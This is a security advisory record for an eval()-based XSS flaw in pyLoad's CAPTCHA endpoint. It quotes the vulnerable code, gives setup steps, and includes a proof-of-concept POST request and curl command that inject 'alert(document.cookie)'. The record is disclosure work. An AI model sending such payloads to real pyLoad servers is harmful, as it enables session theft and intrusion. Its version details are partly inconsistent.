{"id":"PYSEC-2026-496","summary":"pyLoad vulnerable to XSS through insecure CAPTCHA ","details":"#### Summary\nAn unsafe JavaScript evaluation vulnerability in pyLoad’s CAPTCHA processing code allows **unauthenticated remote attackers** to execute **arbitrary code** in the client browser and potentially the backend server. Exploitation requires no user interaction or authentication and can result in session hijacking, credential theft, and full system rce.\n\n\n\n#### Details\nThe vulnerable code resides in \n```javascript\nfunction onCaptchaResult(result) {\n    eval(result); // Direct execution of attacker-controlled input\n}\n```\n\n* The `onCaptchaResult()` function directly passes CAPTCHA results (sent from the user) into `eval()`\n* No sanitization or validation is performed on this input\n* A malicious CAPTCHA result can include JavaScript such as `fetch()` or `child_process.exec()` in environments using NodeJS\n * Attackers can fully hijack sessions and pivot to remote code execution on the server if the environment allows it\n\n\n\n### Reproduction Methods\n1. **Official Source Installation**:\n```bash\ngit clone https://github.com/pyload/pyload\ncd pyload\ngit checkout 0.4.20\npython -m pip install -e .\npyload --userdir=/tmp/pyload\n ```\n\n2. **Virtual Environment**:\n```bash\npython -m venv pyload-env\nsource pyload-env/bin/activate\n pip install pyload==0.4.20\npyload\n```\n\n## CAPTCHA Endpoint Verification\n\n\n **Technical Clarification**:  \n1. The vulnerable endpoint is actually:\n   ```\n   /interactive/captcha\n   ```\n\n2. Complete PoC Request:\n```http\nPOST /interactive/captcha HTTP/1.1\nHost: localhost:8000\nContent-Type: application/x-www-form-urlencoded\n \ncid=123&response=1%3Balert(document.cookie)\n```\n\n3. Curl Command Correction:\n ```bash\ncurl -X POST \"http://localhost:8000/interactive/captcha\" \\\n  -d \"cid=123&response=1%3Balert(document.cookie)\"\n```\n\n\n1. **Vulnerable Code Location**:  \n   The eval() vulnerability is confirmed in:\n   ```\n   src/pyload/webui/app/static/js/captcha-interactive.user.js\n   ```\n\n\n\n### **Resources**\n\n1. https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546\n 2. [OWASP: Avoid `eval()`](https://cheatsheetseries.owasp.org/cheatsheets/JavaScript_Security_Cheat_Sheet.html#eval)\n 3. [#4586](https://github.com/pyload/pyload/pull/4586)","aliases":["CVE-2025-53890","GHSA-8w3f-4r8f-pf53"],"modified":"2026-07-01T20:23:02.916755Z","published":"2026-06-29T11:50:37.278367Z","references":[{"type":"WEB","url":"https://github.com/pyload/pyload/security/advisories/GHSA-8w3f-4r8f-pf53"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2025-53890"},{"type":"WEB","url":"https://github.com/pyload/pyload/pull/4586"},{"type":"WEB","url":"https://github.com/pyload/pyload/commit/909e5c97885237530d1264cfceb5555870eb9546"},{"type":"PACKAGE","url":"https://github.com/pyload/pyload"},{"type":"PACKAGE","url":"https://pypi.org/project/pyload-ng"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-8w3f-4r8f-pf53"}],"affected":[{"package":{"name":"pyload-ng","ecosystem":"PyPI","purl":"pkg:pypi/pyload-ng"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"0.20"}]}],"versions":["0.5.0a5.dev528","0.5.0a5.dev532","0.5.0a5.dev535","0.5.0a5.dev536","0.5.0a5.dev537","0.5.0a5.dev539","0.5.0a5.dev540","0.5.0a5.dev545","0.5.0a5.dev562","0.5.0a5.dev564","0.5.0a5.dev565","0.5.0a6.dev570","0.5.0a6.dev578","0.5.0a6.dev587","0.5.0a7.dev596","0.5.0a8.dev602","0.5.0a9.dev615","0.5.0a9.dev629","0.5.0a9.dev632","0.5.0a9.dev641","0.5.0a9.dev643","0.5.0a9.dev655","0.5.0a9.dev806","0.5.0b1.dev1","0.5.0b1.dev2","0.5.0b1.dev3","0.5.0b1.dev4","0.5.0b1.dev5","0.5.0b2.dev10","0.5.0b2.dev11","0.5.0b2.dev12","0.5.0b2.dev9","0.5.0b3.dev100","0.5.0b3.dev13","0.5.0b3.dev14","0.5.0b3.dev17","0.5.0b3.dev18","0.5.0b3.dev19","0.5.0b3.dev20","0.5.0b3.dev21","0.5.0b3.dev22","0.5.0b3.dev24","0.5.0b3.dev26","0.5.0b3.dev27","0.5.0b3.dev28","0.5.0b3.dev29","0.5.0b3.dev30","0.5.0b3.dev31","0.5.0b3.dev32","0.5.0b3.dev33","0.5.0b3.dev34","0.5.0b3.dev35","0.5.0b3.dev38","0.5.0b3.dev39","0.5.0b3.dev40","0.5.0b3.dev41","0.5.0b3.dev42","0.5.0b3.dev43","0.5.0b3.dev44","0.5.0b3.dev45","0.5.0b3.dev46","0.5.0b3.dev47","0.5.0b3.dev48","0.5.0b3.dev49","0.5.0b3.dev50","0.5.0b3.dev51","0.5.0b3.dev52","0.5.0b3.dev53","0.5.0b3.dev54","0.5.0b3.dev57","0.5.0b3.dev60","0.5.0b3.dev62","0.5.0b3.dev64","0.5.0b3.dev65","0.5.0b3.dev66","0.5.0b3.dev67","0.5.0b3.dev68","0.5.0b3.dev69","0.5.0b3.dev70","0.5.0b3.dev71","0.5.0b3.dev72","0.5.0b3.dev73","0.5.0b3.dev74","0.5.0b3.dev75","0.5.0b3.dev76","0.5.0b3.dev77","0.5.0b3.dev78","0.5.0b3.dev79","0.5.0b3.dev80","0.5.0b3.dev81","0.5.0b3.dev82","0.5.0b3.dev85","0.5.0b3.dev87","0.5.0b3.dev88","0.5.0b3.dev89","0.5.0b3.dev90","0.5.0b3.dev91","0.5.0b3.dev92","0.5.0b3.dev93","0.5.0b3.dev94","0.5.0b3.dev95","0.5.0b3.dev96","0.5.0b3.dev97","0.5.0b3.dev98","0.5.0b3.dev99"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/pyload-ng/PYSEC-2026-496.yaml"}}],"schema_version":"1.7.5","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}]}